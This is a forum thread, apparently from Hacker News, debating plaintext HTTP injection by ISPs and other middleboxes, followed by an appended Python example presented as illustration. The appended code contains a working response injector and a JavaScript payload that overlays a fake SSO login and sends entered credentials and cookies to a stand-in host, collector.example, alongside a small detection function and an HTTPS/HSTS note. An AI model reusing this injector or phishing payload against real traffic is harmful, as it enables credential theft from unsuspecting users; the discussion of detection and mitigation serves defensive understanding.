by prepend 1911 days ago
So what. We’ve all done this stuff and it’s fun for like 5 minutes.

It’s been possible for decades and doesn’t end up being a common problem. And even if it was, the risk is just crap injected into someone’s blog.

1 comment

> It’s been possible for decades and doesn’t end up being a common problem.

https://news.ycombinator.com/item?id=3804608

This is far more common than you think. ISPs, hotels, cafes, mobile providers do this en masse far more than you think. Have you forgotten the NSA “SSL added and removed here”? That was a highly targeted attack against infrastructure. What we’re discussing here is 10x easier to achieve.

> And even if it was the risk is just crap injected into someone’s blog.

That “crap injected” has full control over the DOM, any authentication, and everything displayed. How many of your users would happily put their creds into a fake login modal that popped up claiming to be SSO for a popular identity provider?
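To make the reply concrete, here is an added example that is not part of the thread or anyone's posted code: a Python model of what an inline middlebox (ISP, hotel captive-portal box, mobile carrier) has to do to inject into a plaintext HTTP response, a constructed payload showing why "crap injected" means full control of the page (it runs with the page's own origin, so it can overlay a fake SSO prompt and read non-HttpOnly cookies), and the check a practitioner would run to spot it (fetch the same resource over a path the middlebox cannot rewrite, e.g. HTTPS, and diff the script elements). The function names `inject` and `foreign_scripts`, the sample page, the `/app.js` path and the `collector.example` host are all assumptions made for the example. Chunked and content-encoded responses are deliberately left alone here; a real middlebox would de-chunk or decompress first. Sending everything over HTTPS with HSTS is what actually stops this, since the box cannot rewrite what it cannot read.

```python
import re

# Constructed payload, not taken from any real incident. Once it is in the
# page it executes in the page's origin: it can read document.cookie (for
# cookies without HttpOnly), rewrite any element, and overlay a fake login.
INJECTED_SCRIPT = b"""<script>
(function(){
  var box=document.createElement('div');
  box.style.cssText='position:fixed;inset:0;background:rgba(0,0,0,.6);z-index:2147483647';
  box.innerHTML='<form style="margin:20% auto;width:320px;background:#fff;padding:16px">'
    +'<h3>Session expired, sign in with SSO</h3>'
    +'<input name=u placeholder=Email><input name=p type=password placeholder=Password>'
    +'<button>Sign in</button></form>';
  box.querySelector('form').onsubmit=function(e){
    e.preventDefault();
    var img=new Image();  /* exfiltrate creds + cookies to an assumed collector host */
    img.src='http://collector.example/c?'+encodeURIComponent(this.u.value+':'+this.p.value+':'+document.cookie);
    box.remove();
  };
  document.body.appendChild(box);
})();
</script>"""

# Matches one <script ...>...</script> element (case-insensitive, multi-line).
_SCRIPT_RE = re.compile(rb"<script\b.*?</script>", re.IGNORECASE | re.DOTALL)


def inject(raw_response: bytes, payload: bytes = INJECTED_SCRIPT) -> bytes:
    """Rewrite one plaintext HTTP/1.1 response the way an inline middlebox would.

    Only text/html responses that are neither content-encoded nor chunked are
    touched. The payload goes right before </body> (or at the end if there is
    none) and Content-Length is recomputed so the browser sees a valid reply.
    """
    head, sep, body = raw_response.partition(b"\r\n\r\n")
    if not sep:
        return raw_response                      # not a complete header block
    lines = head.split(b"\r\n")
    status_line, header_lines = lines[0], lines[1:]

    headers = {}
    for line in header_lines:
        name, _, value = line.partition(b":")
        headers[name.strip().lower()] = value.strip()

    if not headers.get(b"content-type", b"").lower().startswith(b"text/html"):
        return raw_response                      # images, JSON, etc. are left alone
    if b"content-encoding" in headers or b"transfer-encoding" in headers:
        return raw_response                      # would need decompress / de-chunk first

    idx = body.lower().rfind(b"</body>")
    new_body = body[:idx] + payload + body[idx:] if idx != -1 else body + payload

    new_header_lines = []
    for line in header_lines:
        if line.lower().startswith(b"content-length:"):
            line = b"Content-Length: " + str(len(new_body)).encode()
        new_header_lines.append(line)
    return b"\r\n".join([status_line] + new_header_lines) + b"\r\n\r\n" + new_body


def foreign_scripts(baseline_html: bytes, observed_html: bytes) -> list:
    """Script elements present in the observed copy but absent from the baseline.

    Baseline is the same document fetched over a path the middlebox cannot
    rewrite (HTTPS, or a trusted out-of-band copy); anything extra is suspect.
    """
    base = set(_SCRIPT_RE.findall(baseline_html))
    return [s for s in _SCRIPT_RE.findall(observed_html) if s not in base]


# Constructed sample: a minimal blog page and its plaintext HTTP response.
SAMPLE_PAGE = b"<html><body><h1>Blog</h1><script src=/app.js></script></body></html>"
SAMPLE_RESPONSE = (
    b"HTTP/1.1 200 OK\r\n"
    b"Content-Type: text/html; charset=utf-8\r\n"
    b"Content-Length: " + str(len(SAMPLE_PAGE)).encode() + b"\r\n"
    b"\r\n" + SAMPLE_PAGE
)

if __name__ == "__main__":
    tampered = inject(SAMPLE_RESPONSE)
    tampered_body = tampered.partition(b"\r\n\r\n")[2]
    print(tampered.decode())
    print("extra scripts:", len(foreign_scripts(SAMPLE_PAGE, tampered_body)))
```

Running the block prints the rewritten response with a corrected Content-Length and reports one script element that the HTTPS baseline does not contain; a PNG response passed to `inject` comes back byte-for-byte unchanged.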